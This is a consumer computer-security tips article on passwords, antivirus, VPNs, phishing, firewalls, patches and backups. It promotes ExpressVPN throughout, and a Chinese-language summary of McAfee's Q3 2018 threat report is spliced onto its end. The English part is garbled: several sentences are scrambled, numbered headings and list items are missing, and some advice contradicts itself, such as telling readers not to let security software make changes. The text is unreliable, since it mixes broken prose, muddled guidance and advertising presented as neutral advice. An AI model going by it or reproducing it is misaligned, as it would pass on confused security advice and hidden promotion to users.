Unauthorized computer access implies the act of invading into a private computer without the owner’s consent. On the other hand, unauthorized computer use means the use of a computer’s data with malicious intentions and without permission from its owner. This act can be a minor or major offense depending on different jurisdictions.

With digital devices exponentially gaining popularity every single day, what also increase is the regular hacking incidents, data prying, unauthorized access, ransomware attacks among many others.

Beefing up security thus becomes the main option. Such scenarios usually arise when you use unsecured access to the internet without firewalls to protect against viruses and malware or leave your system unattended.

Most cybercriminals are aware of loopholes that computer users are unaware of, subjecting them to breach of personal data and the system.

This article is critical in making sure you protect your personal data and protect against malware as well. ExpressVPN details many ways and best tips that users can use to secure their computers against cyber rogues. Remember secure computer results to a peaceful mind.

The unauthorized access to your computer’s operating system. This keeps unwanted people to your computer in the first instance. You may create additional accounts for guests so that your password remains personal.

Moreover, you should be Having a computer password should be a personal policy. It is a first step in stopping all changing your password more often and incorporate numbers and special characters to make it hard for guests to memorize. Your password should neither be written down nor shared with anyone.

Installing antivirus or spyware protection would prevent hackers’ from accessing private information from your computer. These add-ons can monitor your computer and notify you of any attempts that are or were being made by an intruder.

Installing these programs would prevent hackers from collecting your passwords or even credit card details among other important personal information. Always keep the software up-to-date and verify your software security at all times, do not let it make changes to your computer.

Any information security professional would always advise users on strengthening their computer’s data privacy and security by setting up a virtual private network. VPN creates a connection between your computer and a secure server increasing security of the user’s web session, financial transactions, transmitted data, and online personal information. ExpressVPN reduces the risk of your connection being hijacked whether it is on a public Wi-Fi or internet providers who snoop and sell your personal data to advertisers based on your browsing trends and habits.

Moreover, ExpressVPN protects against identity theft by hiding IP addresses, blocking third parties from tracking, bypassing firewalls and accessing online contents privately without censorship. Some key uses of VPN include:-

Read more about ExpressVPN here .

E-mail has become one of the most common ways of attacking a computer. By being able to identify threats sent via email links and attachments would help you protect your computer and data. The following are threats that can be encountered:-

Phishing Attachments You should never run or open e-mail attachments which are sent from addresses that are not familiar to you. Spyware, viruses and other forms of malware are can be distributed through e-mails containing attachments.

Phishing This is an e-mail that seems to be from an official company like your personal bank indicating that you need to log onto the banks’ web link confirm your account settings. However, such e-mails are sites built to steal personal data such as credit card information, passwords, and many other details.

It is advised that all computers should have a firewall solution. Firewalls protect your computer in two ways:-

Hardware firewall This is a physical device which connects to your home/personal network. A router can be used as a firewall solution.

Software firewall This is a software program which is installed on a computer to help protect against unauthorized outgoing and incoming data. Note that this protects a specific computer only.

If you are stepping away from your desk and you want to keep your computer on, make sure you lock it so that it may require a password once someone wishes to access it.

These are devices that authenticate users ‘identity by using their personal characteristics like fingerprints.

8.Install all Security Patches

Do not ignore the security pop-ups, make the updates to protect your data.

9. Maintain a Proper Backup of your Data

This would come in handy, in case of a worst-case event like an attack that would result in data loss. Make backup early and often.

Since there are so many risks in the cyberspace and people can easily get your data without your permission, it is important to know that you have the primary responsibility is to protect yourself. There are so many tips that can help keep you safe like using firewalls, great VPNs like Express VPN, having strong passwords, not sharing your password and many others. Following these tips will prevent you from having to suffer losses or compromising your privacy.

网络安全公司McAfee最新发布的2018年三季度全球网络安全报告（获取报告原文请关注IT经理网微信号ctociocom 后台回复：mcafee2018）显示：第三季度物联网恶意软件增长了73％，出人意料的是虽然加密货币市场经历了雪崩般的暴跌，但加密货币挖矿恶意软件却保持着71％的强劲增速。

与此同时，网络犯罪日益猖獗，网络犯罪和黑社会每分钟制造480个新威胁，有组织网络犯罪分子开始采取新措施规避执法，2017年Hansa和AlphaBay暗网络市场的罢工仍在继续。

以下是报告中的其他亮点发现：

2018年三季度另外一个值得关注的威胁趋势是垃圾邮件僵尸网络开始“井喷”。第三季度大约53％的垃圾邮件僵尸网络流量由Gamut驱动，Gamut是一个产生垃圾邮件的顶级僵尸网络，它会引发“sextortion”性诈骗，这些诈骗要求受害者付款并威胁要公布受害者的浏览习惯。

2018年三季度一个值欣慰的变化是业界对勒索软件和移动恶意软件的遏制收到了成效：根据Mcafee报告，新的移动恶意软件减少了24％，而过去两年的头号威胁――勒索软件三季度的增长仅有10%。（下图）

三季度美洲的数据泄漏事件下降了18％，亚太地区下降了22％，但 欧洲增长了38％ 。

行业方面，金融部门的数据泄露事件在第三季度增加了20％。

2018年一个新的趋势是网络犯罪的“电商化”：为了逃避执法并直接与客户建立信任，一些有组织网络犯罪分子已经从使用大型在线市场转向自立门户，开始创建自己的网店。这种转变为电商网站设计师带来了新的业务。

勒索软件即服务（RaaS）：勒索软件仍然很受欢迎，过去四个季度增长了45％，并且对Gandcrab等领先的RaaS家族的地下论坛产生了浓厚的兴趣。自2017年第四季度以来，独立的勒索软件家族数量有所下降，但相互之间的合作关系有所增加 。例如第三季度GandCrab勒索软件和加密服务NTCrypt之间的合作关系。这种合作伙伴关系和联盟计划提高了感染率和为RaaS客户提供的服务水平。